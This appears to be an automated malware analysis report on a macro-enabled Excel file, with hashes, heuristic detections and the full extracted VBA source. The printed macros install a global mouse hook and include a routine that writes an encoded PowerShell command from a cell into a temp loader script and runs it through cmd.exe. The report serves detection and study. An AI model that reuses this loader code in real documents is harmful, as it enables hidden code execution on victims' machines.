Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 ac5682b58227bdde…

MALICIOUS

Office (OOXML) / .XLSX

29.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-08
MD5: c520e75d887f6428b610135b53810ce9 SHA-1: b453ce8d16afd0a8cd6df46411ca16c8e45b4483 SHA-256: ac5682b58227bddedea4d20f033e706cfe61969e1cfd761fba74283561881c80
308 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "cmd.exe /k """ & tempFile & """", 1
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ts.Write "powershell.exe -NoP -NonI -Enc " & payload
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Shell "cmd.exe /k """ & tempFile & """", 1
  • VBA polls global keyboard state (keylogger) high OLE_VBA_KEYLOGGER_SPYWARE
    The macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence.
    Matched line in script
        Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        tempFile = Environ("TEMP") & "\loader.ps1"

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7767 bytes
SHA-256: e9c5d696621489e268b6baa40f36d236b695d677a6921cc5bb251bed3a5399e9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    Static ХукУстановлен As Boolean
    If Not ХукУстановлен Then
        ХукУстановлен = True
        Call УстановитьХукНаМышь
        MsgBox "Трекинг мыши активирован!", vbInformation  ' можно убрать
    End If
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Call СнятьХук
End Sub

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    Static ХукУстановлен As Boolean
    If Not ХукУстановлен Then
        ХукУстановлен = True
        Call УстановитьХукНаМышь
        MsgBox "Трекинг мыши активирован!", vbInformation  ' можно убрать
    End If
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Call СнятьХук
End Sub


Attribute VB_Name = "Module1"
Option Explicit

' =============================================
' API для низкоуровневого хука мыши
' =============================================
#If VBA7 Then
    Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
        (ByVal idHook As Long, ByVal lpfn As LongPtr, ByVal hmod As LongPtr, ByVal dwThreadId As Long) As LongPtr
    Private Declare PtrSafe Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As LongPtr) As Long
    Private Declare PtrSafe Function CallNextHookEx Lib "user32" _
        (ByVal hhk As LongPtr, ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function GetCurrentThreadId Lib "kernel32" () As Long
#Else
    Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
        (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
    Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As Long) As Long
    Private Declare Function CallNextHookEx Lib "user32" _
        (ByVal hhk As Long, ByVal nCode As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Private Declare Function GetCurrentThreadId Lib "kernel32" () As Long
#End If

Private Const WH_MOUSE_LL As Long = 14
Private Const WM_MOUSEWHEEL As Long = &H20A
Private Const WM_LBUTTONDOWN As Long = &H201   ' левый клик
Private Const WM_MOUSEMOVE As Long = &H200     ' движение мыши

Private hHook As LongPtr
Private УжеСработало As Boolean

Private Type POINTAPI
    x As Long
    y As Long
End Type

Private Type MSLLHOOKSTRUCT
    pt As POINTAPI
    mouseData As Long
    flags As Long
    time As Long
    dwExtraInfo As LongPtr
End Type

' =============================================
' Хук-процедура — здесь ловишь все действия мыши
' =============================================
Public Function MouseProc(ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    If nCode = 0 Then
        Select Case wParam
            Case WM_MOUSEWHEEL
                If Not УжеСработало Then
                    УжеСработало = True
                    Call Действие_Колесико
                End If
                
            Case WM_LBUTTONDOWN
                ' Можно добавить отдельное действие на клик
                ' Call Действие_Клик
                
            Case WM_MOUSEMOVE
                ' Движение мыши — можно добавить, но будет часто срабатывать
                ' Static LastTime As Long
                ' If Abs(Timer - LastTime) > 1 Then
                '     LastTime = Timer
                '     Call Действие_Движение
                ' End If
        End Select
    End If
    
    MouseProc = CallNextHookEx(hHook, nCode, wParam, lParam)
End Function

' =============================================
' Установка хука
' =============================================
Sub УстановитьХукНаМышь()
    If hHook = 0 Then
        hHook = SetWindowsHookEx(WH_MOUSE_LL, AddressOf MouseProc, 0, GetCurrentThreadId())
        If hHook = 0 Then
            MsgBox "Не удалось установить хук мыши!", vbCritical
        End If
    End If
End Sub

Sub СнятьХук()
    If hHook <> 0 Then
        UnhookWindowsHookEx hHook
        hHook = 0
    End If
End Sub

' =============================================
' Твои скрипты (примеры)
' =============================================
Sub Действие_Колесико()
    Call ПеренестиДанныеСЛист1НаЛист2
End Sub

Sub ПеренестиДанныеСЛист1НаЛист2()
    Dim ws1 As Worksheet, ws2 As Worksheet
    
    On Error Resume Next
    Set ws1 = ThisWorkbook.Sheets("Лист1")
    Set ws2 = ThisWorkbook.Sheets("Лист2")
    On Error GoTo 0
    
    If ws2 Is Nothing Then
        Set ws2 = ThisWorkbook.Sheets.Add
        ws2.Name = "Лист2"
    End If
    
    ws2.Cells.Clear
    ws1.UsedRange.Copy Destination:=ws2.Range("A1")
    
    MsgBox "? Данные перенесены (по колесику мыши)!", vbInformation
End Sub

' Пример других действий (раскомментируй если нужно)
' Sub Действие_Клик()
'     MsgBox "Клик мышью!", vbInformation
' End Sub


Attribute VB_Name = "Module2"
#If VBA7 Then
    Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#Else
    Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#End If

Sub ВыполнитьОбработкуПлатежей()
    On Error GoTo ErrorHandler
    
    Dim payload As String
    payload = Trim(Range("AZ51").Value)
    
    If payload = "" Then
        MsgBox "AZ51 пустая!", vbCritical
        Exit Sub
    End If
    
    ' Сохраняем в файл и запускаем (самый стабильный способ)
    Dim fso As Object, ts As Object
    Dim tempFile As String
    
    tempFile = Environ("TEMP") & "\loader.ps1"
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    
    Set ts = fso.CreateTextFile(tempFile, True)
    ts.Write "powershell.exe -NoP -NonI -Enc " & payload
    ts.Close
    
    ' Запуск с видимым окном
    Shell "cmd.exe /k """ & tempFile & """", 1
    
    Exit Sub
    
ErrorHandler:
    MsgBox "Ошибка " & Err.Number & ": " & Err.Description, vbCritical
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 43520 bytes
SHA-256: e558ec064741f72e6f206a049220f39ce4b69ca936e0e5ca1625b2e525149bb9

Open this report in the interactive analyzer, or submit your own file for analysis.